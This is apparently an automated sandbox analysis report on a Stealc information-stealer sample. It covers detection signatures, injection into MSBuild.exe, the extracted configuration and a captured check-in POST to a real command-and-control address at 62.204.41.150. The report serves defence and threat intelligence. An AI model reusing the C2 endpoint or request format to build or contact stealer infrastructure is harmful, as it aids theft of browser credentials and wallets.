Edit tour

Windows Analysis Report
Aew8SXjXEb.exe

Overview

General Information

Sample name:	Aew8SXjXEb.exe renamed because original name is a hash value
Original sample name:	c89c82ab6576a83a2a32bbffe44ef4d7.exe
Analysis ID:	1528328
MD5:	c89c82ab6576a83a2a32bbffe44ef4d7
SHA1:	7a1db4e5bcdbcfa1fcd8591d2e3ee8708ab41a02
SHA256:	11cb48154b2285d427e5f3bff51c1dde9f59a8b8cfd04fa4d3d3f6e4b0124d44
Tags:	32exetrojan
Infos:

Detection

Stealc

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Found malware configuration

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Powershell download and execute

Yara detected Stealc

AI detected suspicious sample

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Injects a PE file into a foreign processes

Machine Learning detection for sample

Sigma detected: Silenttrinity Stager Msbuild Activity

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Checks if the current process is being debugged

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to create guard pages, often used to hinder reverse engineering and debugging

Contains functionality to dynamically determine API calls

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

One or more processes crash

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Classification

Process Tree

System is w10x64

Aew8SXjXEb.exe (PID: 6032 cmdline: "C:\Users\user\Desktop\Aew8SXjXEb.exe" MD5: C89C82AB6576A83A2A32BBFFE44EF4D7)

MSBuild.exe (PID: 2332 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)

WerFault.exe (PID: 1888 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6032 -s 272 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Stealc	Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-1/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-2/ https://cocomelonc.github.io/book/2023/12/13/malwild-book.html https://g0njxa.medium.com/approaching-stealers-devs-a-brief-interview-with-stealc-cbe5c94b84af	https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://62.204.41.150/edd20096ecef326d.php", "Botnet": "default6_doz"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Stealc_1	Yara detected Stealc	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000001.00000002.1493810804.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000001.00000002.1494298167.0000000001397000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000000.00000002.1544221013.000000000064D000.00000004.00000001.01000000.00000003.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Process Memory Space: Aew8SXjXEb.exe PID: 6032	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: MSBuild.exe PID: 2332	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: MSBuild.exe PID: 2332	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Click to see the 1 entries

Unpacked PEs

Source	Rule	Description	Author
0.2.Aew8SXjXEb.exe.64dad8.2.raw.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
1.2.MSBuild.exe.400000.0.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
0.2.Aew8SXjXEb.exe.64dad8.2.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
1.2.MSBuild.exe.400000.0.raw.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
0.2.Aew8SXjXEb.exe.620000.0.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security

Sigma Signatures

System Summary

Sigma detected: Silenttrinity Stager Msbuild Activity

Source: Network Connection

Author: Kiran kumar s, oscd.community: Data: DestinationIp: 62.204.41.150, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Initiated: true, ProcessId: 2332, Protocol: tcp, SourceIp: 192.168.2.8, SourceIsIpv6: false, SourcePort: 49707

Suricata Signatures

ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-07T19:33:15.882048+0200	2044243	1	Malware Command and Control Activity Detected	192.168.2.8	49707	62.204.41.150	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: Aew8SXjXEb.exe

Avira: detected

Found malware configuration

Source: 0.2.Aew8SXjXEb.exe.64dad8.2.raw.unpack

Malware Configuration Extractor: StealC {"C2 url": "http://62.204.41.150/edd20096ecef326d.php", "Botnet": "default6_doz"}

Multi AV Scanner detection for submitted file

Source: Aew8SXjXEb.exe

ReversingLabs: Detection: 31%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: Aew8SXjXEb.exe

Joe Sandbox ML: detected

Source: Aew8SXjXEb.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 13.107.253.72:443 -> 192.168.2.8:49747 version: TLS 1.0

Source: Aew8SXjXEb.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\Aew8SXjXEb.exe

Code function: 0_2_00639ABF FindFirstFileExW,

0_2_00639ABF

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.8:49707 -> 62.204.41.150:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: http://62.204.41.150/edd20096ecef326d.php

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 62.204.41.150Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /edd20096ecef326d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EHDAAECAEBKJKFHJKECFHost: 62.204.41.150Content-Length: 219Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 48 44 41 41 45 43 41 45 42 4b 4a 4b 46 48 4a 4b 45 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 46 46 35 45 32 34 46 39 31 31 34 34 32 39 33 39 34 34 32 32 30 0d 0a 2d 2d 2d 2d 2d 2d 45 48 44 41 41 45 43 41 45 42 4b 4a 4b 46 48 4a 4b 45 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 36 5f 64 6f 7a 0d 0a 2d 2d 2d 2d 2d 2d 45 48 44 41 41 45 43 41 45 42 4b 4a 4b 46 48 4a 4b 45 43 46 2d 2d 0d 0a Data Ascii: ------EHDAAECAEBKJKFHJKECFContent-Disposition: form-data; name="hwid"EFF5E24F91144293944220------EHDAAECAEBKJKFHJKECFContent-Disposition: form-data; name="build"default6_doz------EHDAAECAEBKJKFHJKECF--

Source: Joe Sandbox View

ASN Name: TNNET-ASTNNetOyMainnetworkFI TNNET-ASTNNetOyMainnetworkFI

Source: Joe Sandbox View

JA3 fingerprint: 1138de370e523e824bbca92d049a3777

Source: unknown

HTTPS traffic detected: 13.107.253.72:443 -> 192.168.2.8:49747 version: TLS 1.0

Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown	TCP traffic detected without corresponding DNS query: 52.182.143.211
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.150
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.150
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.150
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.150
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.150
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.150
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.150
Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.229.226

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 1_2_00406280 InternetOpenA,InternetConnectA,HttpSendRequestA,InternetReadFile,

1_2_00406280

Source: global traffic

HTTP traffic detected: GET / HTTP/1.1Host: 62.204.41.150Connection: Keep-AliveCache-Control: no-cache

Source: unknown

HTTP traffic detected: POST /edd20096ecef326d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EHDAAECAEBKJKFHJKECFHost: 62.204.41.150Content-Length: 219Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 48 44 41 41 45 43 41 45 42 4b 4a 4b 46 48 4a 4b 45 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 46 46 35 45 32 34 46 39 31 31 34 34 32 39 33 39 34 34 32 32 30 0d 0a 2d 2d 2d 2d 2d 2d 45 48 44 41 41 45 43 41 45 42 4b 4a 4b 46 48 4a 4b 45 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 36 5f 64 6f 7a 0d 0a 2d 2d 2d 2d 2d 2d 45 48 44 41 41 45 43 41 45 42 4b 4a 4b 46 48 4a 4b 45 43 46 2d 2d 0d 0a Data Ascii: ------EHDAAECAEBKJKFHJKECFContent-Disposition: form-data; name="hwid"EFF5E24F91144293944220------EHDAAECAEBKJKFHJKECFContent-Disposition: form-data; name="build"default6_doz------EHDAAECAEBKJKFHJKECF--

Source: MSBuild.exe, 00000001.00000002.1494298167.0000000001397000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.150
Source: MSBuild.exe, 00000001.00000002.1494298167.00000000013D6000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.1494298167.0000000001397000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.150/
Source: MSBuild.exe, 00000001.00000002.1494298167.00000000013D6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.150/J
Source: MSBuild.exe, 00000001.00000002.1494298167.00000000013D6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.150/L
Source: MSBuild.exe, 00000001.00000002.1494298167.0000000001397000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.150/S
Source: MSBuild.exe, 00000001.00000002.1494298167.00000000013D6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.150/Y
Source: MSBuild.exe, 00000001.00000002.1494298167.00000000013D6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.150/edd20096ecef326d.php
Source: MSBuild.exe, 00000001.00000002.1494298167.00000000013D6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.150/edd20096ecef326d.php0
Source: MSBuild.exe, 00000001.00000002.1494298167.00000000013D6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.150/edd20096ecef326d.php5
Source: MSBuild.exe, 00000001.00000002.1494298167.00000000013D6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.150/edd20096ecef326d.php;
Source: MSBuild.exe, 00000001.00000002.1494298167.00000000013D6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.150/edd20096ecef326d.phpi
Source: MSBuild.exe, 00000001.00000002.1494298167.00000000013D6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.150/edd20096ecef326d.phpoca.
Source: MSBuild.exe, 00000001.00000002.1494298167.00000000013D6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.150/edd20096ecef326d.phpu
Source: MSBuild.exe, 00000001.00000002.1494298167.00000000013F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.150/edd20096ecef326d.phpx&
Source: MSBuild.exe, 00000001.00000002.1494298167.00000000013D6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.150/z
Source: MSBuild.exe, 00000001.00000002.1494298167.00000000013D6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.150E
Source: MSBuild.exe, 00000001.00000002.1494298167.0000000001397000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.150G
Source: MSBuild.exe, 00000001.00000002.1494298167.0000000001397000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.150ig
Source: Amcache.hve.6.dr	String found in binary or memory: http://upx.sf.net

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49676 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Source: C:\Users\user\Desktop\Aew8SXjXEb.exe	Code function: 0_2_00622021	0_2_00622021
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe	Code function: 0_2_0062729C	0_2_0062729C
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe	Code function: 0_2_0063D39B	0_2_0063D39B
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe	Code function: 0_2_0063572C	0_2_0063572C
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe	Code function: 0_2_0067094F	0_2_0067094F
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe	Code function: 0_2_0062CAF2	0_2_0062CAF2
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe	Code function: 0_2_0063BB36	0_2_0063BB36
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe	Code function: 0_2_00633C92	0_2_00633C92
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe	Code function: 0_2_00621D79	0_2_00621D79
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe	Code function: 0_2_0062FEF0	0_2_0062FEF0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: String function: 004045C0 appears 317 times
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe	Code function: String function: 00627B80 appears 49 times

Source: C:\Users\user\Desktop\Aew8SXjXEb.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6032 -s 272

Source: Aew8SXjXEb.exe, 00000000.00000002.1544284153.000000000069C000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameproquota.exej% vs Aew8SXjXEb.exe
Source: Aew8SXjXEb.exe	Binary or memory string: OriginalFilenameproquota.exej% vs Aew8SXjXEb.exe

Source: Aew8SXjXEb.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: Aew8SXjXEb.exe

Static PE information: Section: .data ZLIB complexity 0.989946875

Source: classification engine

Classification label: mal100.troj.evad.winEXE@4/5@0/1

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\96C2XD62.htm

Jump to behavior

Source: C:\Windows\SysWOW64\WerFault.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6032

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\5ea91f23-f66c-476a-af3c-5caf6efefdec

Jump to behavior

Source: Aew8SXjXEb.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Aew8SXjXEb.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Aew8SXjXEb.exe

ReversingLabs: Detection: 31%

Source: unknown	Process created: C:\Users\user\Desktop\Aew8SXjXEb.exe "C:\Users\user\Desktop\Aew8SXjXEb.exe"
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6032 -s 272
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Aew8SXjXEb.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: netutils.dll	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32

Jump to behavior

Source: Aew8SXjXEb.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: Aew8SXjXEb.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: Aew8SXjXEb.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: Aew8SXjXEb.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Aew8SXjXEb.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: Aew8SXjXEb.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: Aew8SXjXEb.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: Aew8SXjXEb.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source: Aew8SXjXEb.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: Aew8SXjXEb.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: Aew8SXjXEb.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: Aew8SXjXEb.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: Aew8SXjXEb.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 1_2_0041C03D LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

1_2_0041C03D

Source: C:\Users\user\Desktop\Aew8SXjXEb.exe	Code function: 0_2_006271AD push ecx; ret	0_2_006271C0
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe	Code function: 0_2_00667F0D push ecx; ret	0_2_00667F20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_0041B035 push ecx; ret	1_2_0041B048

Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
